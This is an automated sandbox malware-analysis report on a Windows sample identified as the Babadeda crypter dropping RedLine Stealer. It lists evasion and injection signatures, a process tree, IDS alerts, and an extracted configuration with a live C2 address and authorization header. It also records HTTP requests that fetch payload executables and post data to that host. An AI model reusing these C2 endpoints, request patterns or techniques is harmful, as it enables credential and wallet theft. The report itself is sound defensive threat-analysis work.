Windows Analysis Report
K6qneGSDSB.exe

Overview

General Information

Sample name: K6qneGSDSB.exe (renamed because original name is a hash value)
Original sample name: 52c82f6ceb8cf41de8a4c01b313e3712.exe
Analysis ID: 1575318
MD5: 52c82f6ceb8cf41de8a4c01b313e3712
SHA1: 69b699431dbbee3b6fd76d762a27db30f1f792b5
SHA256: 0a9bec73980eb6774e0e50da9dd812551d20a7d839020976ebdc0fb93ed2ebf9
Tags: exe, user-abuse_ch
Infos:

Detection

Babadeda, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Benign windows process drops PE files
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Babadeda
Yara detected RedLine Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • K6qneGSDSB.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\K6qneGSDSB.exe" MD5: 52C82F6CEB8CF41DE8A4C01B313E3712)
    • systemsx.exe (PID: 5752 cmdline: "C:\Users\user\AppData\Roaming\systemsx.exe" MD5: 1BBC3BFF13812C25D47CD84BCA3DA2DC)
      • msiexec.exe (PID: 6348 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
      • audiodg.exe (PID: 3092 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
      • svchost.exe (PID: 5016 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • DB9C.tmp.ssg.exe (PID: 1292 cmdline: "C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe" MD5: 7B6730CA4DA283A35C41B831B9567F15)
          • 616766F8886C145454191.exe (PID: 7088 cmdline: "C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe" MD5: 1BBC3BFF13812C25D47CD84BCA3DA2DC)
            • svchost.exe (PID: 5484 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • audiodg.exe (PID: 6480 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
            • msiexec.exe (PID: 4744 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
          • 616766F8886C145454191.exe (PID: 5632 cmdline: "C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe" MD5: 1BBC3BFF13812C25D47CD84BCA3DA2DC)
            • svchost.exe (PID: 4084 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • audiodg.exe (PID: 5260 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
            • msiexec.exe (PID: 1084 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
          • 58B.tmp.zx.exe (PID: 5476 cmdline: "C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe" MD5: B40682DDC13C95E3C0228D09A3B6AAE2)
            • 58B.tmp.zx.exe (PID: 4508 cmdline: "C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe" MD5: B40682DDC13C95E3C0228D09A3B6AAE2)
    • Grabber.exe (PID: 5768 cmdline: "Grabber.exe" MD5: 7BCE43CC96CC747B5909B5FA404C7FFE)
      • cmd.exe (PID: 7140 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.bat C:\Users\user\Desktop\Grabber.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Babadeda
Description: According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers' analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

{"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
C:\Users\user\Desktop\Grabber.exe | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |

Source | Rule | Description | Author | Strings
0000000A.00000000.2151588045.0000000000E52000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0x3dddd:$s2: ReflectiveLoader@
00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0x3c9dd:$s2: ReflectiveLoader@
00000007.00000000.2060880149.0000000008B70000.00000040.00000001.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0x3c9dd:$s2: ReflectiveLoader@
00000006.00000002.3291804673.00000251E2E7D000.00000004.00000020.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0x3c9dd:$s2: ReflectiveLoader@

Source | Rule | Description | Author | Strings
2.0.Grabber.exe.400000.0.unpack | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
0.2.K6qneGSDSB.exe.7ff79cdc4c80.2.raw.unpack | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
7.3.explorer.exe.ca53600.6.raw.unpack | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0x3c9dd:$s2: ReflectiveLoader@
0.0.K6qneGSDSB.exe.7ff79cdc4c80.2.raw.unpack | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
7.2.explorer.exe.e8b0000.3.raw.unpack | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0x3dddd:$s2: ReflectiveLoader@

System Summary

Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\systemsx.exe, ProcessId: 5752, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\systemsx.exe", ParentImage: C:\Users\user\AppData\Roaming\systemsx.exe, ParentProcessId: 5752, ParentProcessName: systemsx.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 5016, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\systemsx.exe", ParentImage: C:\Users\user\AppData\Roaming\systemsx.exe, ParentProcessId: 5752, ParentProcessName: systemsx.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 5016, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-15T09:12:11.747831+0100 | 2043234 | 1 | A Network Trojan was detected | 185.81.68.147 | 1912 | 192.168.2.5 | 49709 | TCP
2024-12-15T09:12:11.312305+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:16.838110+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:17.585683+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:18.059346+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:18.560307+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:18.864446+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:19.934900+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:20.239393+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:20.551913+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:21.044107+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:22.123287+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:22.563933+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:23.696023+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:24.134576+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:24.574403+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:25.139811+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:25.618679+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:26.056348+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:26.495368+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:26.932334+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:27.682095+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:27.802215+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:32.460143+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:33.130578+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:33.566408+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:34.002387+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:34.479473+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:17.275073+0100 | 2046056 | 1 | A Network Trojan was detected | 185.81.68.147 | 1912 | 192.168.2.5 | 49709 | TCP
2024-12-15T09:12:07.859403+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49707 | 185.81.68.147 | 80 | TCP
2024-12-15T09:12:10.502400+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49708 | 185.81.68.147 | 80 | TCP
2024-12-15T09:12:11.312305+0100 | 2046045 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP

AV Detection

Source: K6qneGSDSB.exe; Avira: detected
Source: http://185.81.68.147/VzCAHn.php?616766F8886C145454191; Avira URL Cloud: Label: phishing
Source: 10.0.DB9C.tmp.ssg.exe.e50000.0.unpack; Malware Configuration Extractor: RedLine {"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe; ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe; ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\systemsx.exe; ReversingLabs: Detection: 75%
Source: C:\Users\user\Desktop\Grabber.exe; ReversingLabs: Detection: 46%
Source: K6qneGSDSB.exe; ReversingLabs: Detection: 60%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Temp\12DB.tmp.update.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe; Joe Sandbox ML: detected
Source: K6qneGSDSB.exe; Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\Desktop\Grabber.exe; Unpacked PE file: 2.2.Grabber.exe.400000.0.unpack
Source: K6qneGSDSB.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD671BC _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF79CD671BC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F279B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,20_2_00007FF641F279B0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F285A0 FindFirstFileExW,FindClose,20_2_00007FF641F285A0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F40B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_00007FF641F40B84
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F285A0 FindFirstFileExW,FindClose,21_2_00007FF641F285A0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F40B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00007FF641F40B84
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F279B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,21_2_00007FF641F279B0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B837303C FindFirstFileExW,FindNextFileW,FindClose,21_2_00007FF8B837303C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8373280 FindFirstFileExW,FindNextFileW,FindClose,21_2_00007FF8B8373280
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\Temp\B334.tmp
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.tmp

                  Networking

                  Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49709 -> 185.81.68.147:1912
                  Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49709 -> 185.81.68.147:1912
                  Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.81.68.147:1912 -> 192.168.2.5:49709
                  Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.81.68.147:1912 -> 192.168.2.5:49709
                  Source: C:\Windows\explorer.exeNetwork Connect: 185.81.68.147 80
                  Source: Malware configuration extractorURLs: 185.81.68.147:1912
                  Source: global trafficTCP traffic: 192.168.2.5:49709 -> 185.81.68.147:1912
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 15 Dec 2024 16:12:07 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 10:50:51 GMTETag: "4b200-629107cd804d2"Accept-Ranges: bytesContent-Length: 307712Connection: closeContent-Type: application/x-msdownload
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 15 Dec 2024 16:12:09 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sat, 14 Dec 2024 13:10:00 GMTETag: "5a4536-6293aaa2cd4c8"Accept-Ranges: bytesContent-Length: 5915958Connection: closeContent-Type: application/x-msdownload
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 15 Dec 2024 16:12:21 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sun, 15 Dec 2024 06:09:39 GMTETag: "4ba00-62948e8bd5049"Accept-Ranges: bytesContent-Length: 309760Connection: closeContent-Type: application/x-msdownload
                  Source: Joe Sandbox ViewIP Address: 185.81.68.147 185.81.68.147
                  Source: Joe Sandbox ViewASN Name: KLNOPT-ASFI KLNOPT-ASFI
                  Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49707 -> 185.81.68.147:80
                  Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49708 -> 185.81.68.147:80
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 37
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: global trafficHTTP traffic detected: GET /zx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: unknown; TCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: C:\Users\user\AppData\Roaming\systemsx.exe; Code function: 1_2_00007FF794831CDC InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,RtlAllocateHeap,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,1_2_00007FF794831CDC
                  Source: global traffic; HTTP traffic detected: GET /ssg.exe HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: global traffic; HTTP traffic detected: GET /zx.exe HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: global traffic; HTTP traffic detected: GET /update.exe HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: unknown; HTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: explorer.exe, 00000007.00000003.3101632839.000000000AA14000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://185.81.68.147/ssg.exe
                  Source: explorer.exe, 00000007.00000003.3101632839.000000000AA14000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://185.81.68.147/update.exe
                  Source: explorer.exe, 00000007.00000003.3101632839.000000000AA14000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://185.81.68.147/zx.exe
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
